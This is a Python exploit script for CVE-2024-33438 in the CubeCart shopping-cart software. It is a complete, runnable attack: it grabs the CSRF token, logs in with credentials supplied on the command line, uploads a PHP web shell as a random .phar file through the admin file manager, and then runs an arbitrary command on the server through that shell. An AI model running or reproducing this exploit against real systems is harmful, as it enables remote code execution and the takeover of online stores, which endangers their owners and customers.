#!/usr/bin/python3

import requests
import random
import re
import sys

banner = """\n     []  ,----.___
   __||_/___      '.
  / O||    /|       
 /   ""   / /   
/________/ /   launching exploit
|________|/    please wait...
"""
print(banner)

# General help

if len(sys.argv) == 1:
    print("No arguments. Try '-h' or '--help' to understand how this exploit works.")
    sys.exit()

if len(sys.argv) > 5:
    print("Too many arguments. Try '-h' or '--help' to understand how this exploit works.")
    sys.exit()

if len(sys.argv) < 5:
    print("Not enough arguments. Try '-h' or '--help' to understand how this exploit works.")
    sys.exit()

if sys.argv[1].lower() == "-h" or sys.argv[1].lower() == "--help":
    print("Usage: python3 CubeCart-CVE-2024-33438.py <URL> <username> <password> <command>\nExample: python3 CubeCart-CVE-2024-33438.py http://127.0.0.1/admin_0Kqnr9.php admin admin whoami\n")
    sys.exit()

# Variables
URL, username, password, cmd = sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4]
filename = str(random.getrandbits(32)) + ".phar"
files = {'file': (filename, '<?php system($_GET[\'cmd\']) ?>')}

# First request, grabbing the CSRF token
print("[+] Trying to log into the application...")
req1 = requests.get(URL)
token_match = re.search(r'<input type="hidden" name="token" class="cc_session_token" value="([^"]+)', req1.text)
mytoken = token_match.group(1)

# Second request, logging into the application
payload = {"username": username, "password": password, "redir": f"{URL}+p?_g=login", "login": "Log In", "token": mytoken}
req2 = requests.post(URL, data=payload, allow_redirects=False)
all_cookies = req2.headers.get("Set-Cookie")
session_cookie = re.search(r'CC'+'_([^=]+)', all_cookies)
session_cookie_name = 'CC_'+session_cookie.group(1)
session_cookie_value = re.search(r''+session_cookie_name+'=([^;]+)', all_cookies)
session_cookie_value = session_cookie_value.group(1)

# Third request, validating that the user is authenticated
req3 = requests.get(URL, cookies={session_cookie_name: session_cookie_value})
if int(req3.headers.get("Content-Length")) < 3000:
    print("[!] Login failed. Exiting the exploit...")
    sys.exit()

# Forth request, uploading a simple web shell
print("[+] Successful login. Uploading a simple web shell to the server...")
req4 = requests.post(URL+"?_g=filemanager", files=files, cookies={session_cookie_name: session_cookie_value})

# Fifth request, validating that the web shell was uploaded
req5 = requests.get(URL.split("/admin")[0]+"/images/source/")
if filename not in req5.text:
    print("[!] It wasn't possible to upload the web shell. Exiting the exploit...")
    sys.exit()

# Sixth request, executing the command
print("[+] Executing command...\n")
req6 = requests.get(URL.split("/admin")[0]+"/images/source/"+filename+"?cmd="+cmd)
print("Output: " + req6.text)